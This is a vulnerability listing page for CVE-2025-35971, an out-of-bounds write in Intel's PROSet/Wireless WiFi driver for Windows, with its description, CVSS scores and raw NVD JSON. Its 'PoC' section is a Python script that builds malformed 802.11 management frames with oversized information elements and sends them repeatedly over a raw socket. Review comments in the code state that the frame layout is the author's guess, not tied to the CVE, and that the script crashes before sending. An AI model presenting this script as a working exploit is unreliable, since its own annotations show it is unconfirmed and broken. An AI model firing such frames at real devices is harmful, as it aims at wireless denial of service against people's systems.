Security Vulnerability Report
CVE-2025-35971 CVSS 8.2 HIGH

CVE-2025-35971

Published: 2025-11-11 17:15:52
Last Modified: 2026-04-15 00:35:42

Description

Out-of-bounds write for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (low) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts.

CVSS Details (CVSS 3.1; the raw JSON record below also carries a CVSS 4.0 base score of 8.3 HIGH)

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Intel PROSet/Wireless WiFi Software for Windows < 23.160

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-35971 PoC - Intel WiFi Driver Out-of-Bounds Write
# This PoC demonstrates the vulnerability concept (DoS via malformed packets)
# Note: This is for educational and authorized testing purposes only
#
# NOTE(review): the CVE description on this page names only an out-of-bounds
# write in the Windows driver; it gives no frame layout and no trigger. The
# field values below are the listing author's illustration, not a confirmed
# reproduction, and the script does not run to completion as published (see
# the note on the radiotap header). The description lists versions before
# 23.160 as affected, so patch status is what decides exposure, not this
# listing.
import struct
import socket
import sys


def create_malformed_wifi_frame() -> bytes:
    """Build the byte string this listing labels a malformed management frame.

    Concatenates a packed radiotap-style header with an 802.11 header and
    three information elements. As published, the struct.pack call for the
    radiotap header raises struct.error, so nothing is returned.
    """
    # Radiotap header
    # NOTE(review): the per-field labels are the author's and do not line up
    # with the format string. 0x0a000000 does not fit the 16-bit 'H' slot, so
    # struct.pack raises struct.error here.
    radiotap = struct.pack('<BBHiIBBHII',
        0x00,        # version
        0x00,        # pad
        0x0a000000,  # length
        0,           # present flags
        0,           # pad
        0x0000,      # flags
        0x0000,      # rate
        0x0000,      # channel frequency
        0x0000,      # channel flags
        0x00000000   # antenna signal
    )

    # Malformed IEEE 802.11 frame header
    # Frame Control (2 bytes) + Duration (2 bytes) + 3 addresses (18 bytes)
    # NOTE(review): 0x0080 packed little-endian is type management, subtype
    # beacon; the To DS bit (0x0100) is not set, despite the original label.
    frame_control = struct.pack('<H', 0x0080)  # Management frame, To DS
    duration = struct.pack('<H', 0x013a)

    # Target BSSID (spoofed)
    bssid = b'\xff\xff\xff\xff\xff\xff'
    # Source address (attacker)
    src_addr = b'\x00\x11\x22\x33\x44\x55'
    # Destination address
    dst_addr = b'\x66\x77\x88\x99\xaa\xbb'

    # Sequence control (2 bytes)
    seq_ctrl = struct.pack('<H', 0x0000)

    # Malformed information elements - trigger buffer overflow
    # SSID IE with oversized length field
    # NOTE(review): the declared length (0xFF) equals the 255 bytes supplied,
    # so the element is a consistent TLV. What is out of spec is an SSID
    # element longer than the 32 octets that 802.11 allows, which a wireless
    # IDS can flag independently of this CVE.
    ssid_ie = b'\x00'  # SSID tag number
    ssid_len = struct.pack('B', 0xFF)  # Malicious oversized length
    ssid_data = b'A' * 255  # Data that will cause OOB write

    # Supported Rates IE
    rates_ie = b'\x01\x04\x96\x9c\x12\x24'  # Rates tag

    # Tag number 255 (vendor specific) with excessive length
    # NOTE(review): element ID 255 is the Element ID Extension; the
    # vendor-specific element is ID 221. The declared length again matches
    # the data.
    vendor_ie = b'\xff' + struct.pack('B', 0xFF) + (b'\x00' * 255)

    # Combine all elements
    payload = (frame_control + duration + dst_addr + bssid + src_addr + seq_ctrl + ssid_ie + ssid_len + ssid_data + rates_ie + vendor_ie)
    return radiotap + payload


def send_malicious_frames(interface: str = 'wlan0', count: int = 100) -> None:
    """Open a raw AF_PACKET socket on *interface* and write the frame *count* times.

    Exits the process with status 1 on PermissionError or on any other
    exception.
    """
    try:
        # AF_PACKET is only available on Linux.
        sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, 0)
        sock.bind((interface, 0))
        # NOTE(review): the struct.error raised while building the frame is
        # caught by the generic handler below, so the published script prints
        # an error and exits before any send() call. On that path the socket
        # is not closed explicitly.
        malformed_frame = create_malformed_wifi_frame()
        print(f"[*] Sending {count} malformed frames on {interface}")
        print(f"[*] Frame size: {len(malformed_frame)} bytes")
        for i in range(count):
            sock.send(malformed_frame)
            if i % 10 == 0:
                print(f"[*] Sent {i} frames...")
        print(f"[+] Completed sending {count} frames")
        sock.close()
    except PermissionError:
        print("[-] Error: Requires root privileges")
        sys.exit(1)
    except Exception as e:
        print(f"[-] Error: {e}")
        sys.exit(1)


if __name__ == '__main__':
    print("CVE-2025-35971 PoC - Intel WiFi Driver OOB Write")
    print("WARNING: Use only in authorized testing environments")
    print("-" * 50)
    # The interface name comes from the first CLI argument, defaulting to 'wlan0'.
    interface = sys.argv[1] if len(sys.argv) > 1 else 'wlan0'
    send_malicious_frames(interface, count=100)

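References

https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01398.html (vendor advisory, as listed in the raw JSON record below)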

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-35971", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:51.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds write for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (low) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01398.html", "source": "[email protected]"}]}}